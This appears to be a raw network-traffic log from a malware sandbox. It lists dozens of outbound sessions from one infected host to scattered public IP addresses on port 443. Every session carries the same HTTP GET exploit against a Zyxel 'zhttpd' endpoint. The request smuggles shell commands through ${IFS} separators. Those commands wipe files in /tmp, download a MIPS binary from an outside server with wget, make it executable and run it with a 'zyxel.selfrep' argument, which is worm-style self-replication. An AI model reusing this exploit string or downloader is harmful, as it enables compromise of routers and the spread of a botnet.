                                                Jan 12, 2024 18:24:31.734797001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3281192.168.2.1359102167.3.171.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734841108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3282192.168.2.133890481.50.85.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734882116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3283192.168.2.1338318133.135.26.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734921932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3284192.168.2.1350100198.230.242.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734946012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3285192.168.2.1347380185.40.242.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735004902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3286192.168.2.1335912148.234.71.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735038996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3287192.168.2.1358380199.91.107.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735090971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3288192.168.2.1333244184.54.224.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735111952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3289192.168.2.1347530174.179.212.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735155106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3290192.168.2.1345458126.239.69.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735187054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3291192.168.2.1346226145.42.170.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735244989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3292192.168.2.136075877.129.158.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735271931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3293192.168.2.1333732191.7.209.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735311031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3294192.168.2.134602047.90.84.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735344887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3295192.168.2.1346800211.59.132.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735363960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3296192.168.2.133307225.112.121.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735426903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3297192.168.2.1348220133.245.192.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735464096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3298192.168.2.135585013.154.142.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735496998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3299192.168.2.1347412208.79.187.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735547066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3300192.168.2.1334534115.254.180.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735572100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3301192.168.2.134947488.205.66.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735624075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3302192.168.2.135348860.45.225.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735651016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3303192.168.2.1337328109.227.201.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735707045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3304192.168.2.1338840143.2.30.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735742092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3305192.168.2.1359004210.64.201.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735768080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3306192.168.2.1346218104.188.84.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735801935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3307192.168.2.135795257.212.25.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735858917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3308192.168.2.1348054134.78.6.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735888004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3309192.168.2.134889234.5.37.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735932112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3310192.168.2.13504881.254.89.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.735980988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3311192.168.2.1350674124.105.128.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736032963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3312192.168.2.134788273.183.220.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736069918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3313192.168.2.1334670176.4.155.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736109018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3314192.168.2.1357472115.182.46.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736146927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3315192.168.2.134138646.93.223.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736205101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3316192.168.2.1349162203.129.233.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736241102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3317192.168.2.1356640118.196.85.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736259937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3318192.168.2.1357352106.67.101.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736310959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3319192.168.2.1359822179.169.9.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736346006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3320192.168.2.1340590181.201.185.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736377001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3321192.168.2.1345546205.205.136.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736403942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3322192.168.2.1338364138.124.168.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736455917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3323192.168.2.1350930131.103.254.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736455917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3324192.168.2.1334262171.96.83.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736517906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3325192.168.2.1360568163.117.237.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736541033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3326192.168.2.1341112160.172.8.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736579895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3327192.168.2.134891298.132.151.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736608028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3328192.168.2.1352734162.9.137.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736654043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3329192.168.2.1347890199.75.224.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736705065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3330192.168.2.135996437.120.48.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736736059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3331192.168.2.1344734187.157.216.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736772060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3332192.168.2.1354320114.244.166.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736814976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3333192.168.2.1353536192.245.106.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736844063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3334192.168.2.1346772164.10.78.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736880064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3335192.168.2.136088873.244.28.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736932993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3336192.168.2.1339878197.82.227.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.736947060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3337192.168.2.135427065.105.225.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737006903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3338192.168.2.135526065.118.192.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737046003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3339192.168.2.1354590185.151.243.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737087011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3340192.168.2.1352328105.89.25.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737116098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3341192.168.2.133805264.203.207.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737153053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3342192.168.2.133651846.205.22.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.737190008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3343192.168.2.13589522.6.229.250443
                                                TimestampBytes transferredDirectionData
